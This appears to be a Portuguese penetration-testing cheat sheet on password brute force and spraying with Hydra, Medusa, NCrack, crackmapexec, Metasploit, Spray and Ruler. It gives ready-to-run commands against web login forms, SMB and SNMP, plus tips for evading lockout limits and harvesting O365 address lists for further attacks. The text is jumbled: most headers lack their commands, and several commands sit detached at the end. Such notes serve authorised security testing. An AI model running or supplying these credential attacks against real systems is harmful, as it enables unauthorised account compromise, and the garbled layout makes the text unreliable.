EXPLICAÇÃO-w 2s = Define que irá realizar uma nova tentativa a cada 2 segundos
-f = Assim que achar uma conta válida, ignore o resto da wordlist
OBS.: Utilizamos aqui como exemplo o SSH, mas o Hydra suporta outros protocolos como FTP, Telnet, etc. Basta alterar o protocolo no final do comando.
Medusa
medusa-h<ip>-n22-U<usuario>-P<wordlist.txt>-Mssh
HTTP Form
Hydra
OBS.: Atente-se aos : (dois pontos) nos parâmetros e sempre matenha os parâmetros ^USER^ e ^PASS^ e troque o login.php pelo nome do arquivo/página que realiza de fato a autenticação.
Tudo o que não tiver a frase Mensagem que aparece na falha, será considerado como login correto.
DICA: Caso seja uma página onde só há um input e não dois (como no exemplo acima que usamos user e pass), matenha o -l admin (mesmo que não exista) e passe o parâmentro -P com a wordlist. Por exemplo:
Case use cookie ou algo no cabeçalho, utilize o seguinte padrão:
Hydra + Proxy
Para interceptar as requisições via Burp Suite, utilize o seguinte comando antes de executar o hydra.
Basic Authentication
Realize esse tipo de ataque quando aparecer um popup solicitando um usuário e senha assim que acessar a página WEB.
Hydra
Utilize http-head caso o http-get não funcione
Medusa
FTP
Hydra
Realizando Brute Force em diversos servidores
EXPLICAÇÃO-w 2s = Define que irá realizar uma nova tentativa a cada 2 segundos
-f = Assim que achar uma conta válida, ignore o resto da wordlist
NCrack
Caso queira deixá-lo mais rápido, utilize o argumento -T 5 ou -t 5 semelhante ao NMAP. Em casos onde há bloqueio de tentativas simultâneas, diminua o valor para 2 (por exemplo), para bypassar esse bloqueio.
nmap
RDP (Windows)
ncrack
hydra
SNMP
Hydra
Metasploit
SMB
crackmapexec
Hydra
NCrack
Medusa
Microsoft SQL Server
Metasploit
nmap
Spray
Está ferramenta serve para realizar brute force seguindo o Password Spraying, que segue uma abordagem um pouco diferente do brute force tradicional, pois essa utiliza uma wordlist específica para o alvo, e também respeita limites de tentativas e tempo de espera, para evitar que a conta seja bloqueada. Este processo pode ser um tanto quanto lento, porém pode trazer bons resultados.
O Spray suporta protocolos como SMB, OVA e LYNC (Microsoft Chat).
Caso esteja utilizando um POST, salve a requisição (Burp Suite) em um arquivo de texto e altere o valor do POST para o seguinte formato de exemplo e depois utilize a sintaxe abaixo:
username=sprayuser@domain.com&password=spraypassword
Ruler
Esta é uma ferramenta que permite interagir remotamente com Servidores Exchange, por meio do protocolo MAPI/HTTP ou RPC/HTTP. O objetivo principal é abusar dos recursos do Outlook do lado do cliente e obter um shell remotamente.
Uma vez que conseguimos pegar credenciais válidas, podemos fazer um dump de todos os usuários do O365 Global Address List (GAL) e depois fazermos brute force com as novas contas localizadas.
hydra -L <wordlist-user.txt> -P <wordlist-passwords.txt> <domain_wihtout_http> -s <port> http-post-form "/login.php:user=^USER^&pass=^PASS^:Mensagem que aparece na falha"
hydra -l admin -P <wordlist.txt> <domain_wihtout_http> http-post-form "/index.php:password=^PASS^:<mensagem de erro>"
hydra -L <wordlist_user.txt> -P <wordlist_pass.txt> <domain_wihtout_http> http-post-form "/index.php:user=^USER^&pass=^PASS^:F=Mensagem que aparece na falha:H=Cookie: PHPSESSID=2hosvf7f7g1ap5g0esc2k8tsqj; path=/"
msfconsole
use auxiliary/scanner/snmp/snmp_login
set RHOSTS <ip>
set THREADS 5
exploit
crackmapexec smb <ip> -u <user.txt> -p <pass.txt>
# Configurando para não parar o teste após encontrar uma conta válida
crackmapexec smb <ip> -u <user.txt> -p <pass.txt> --continue-on-success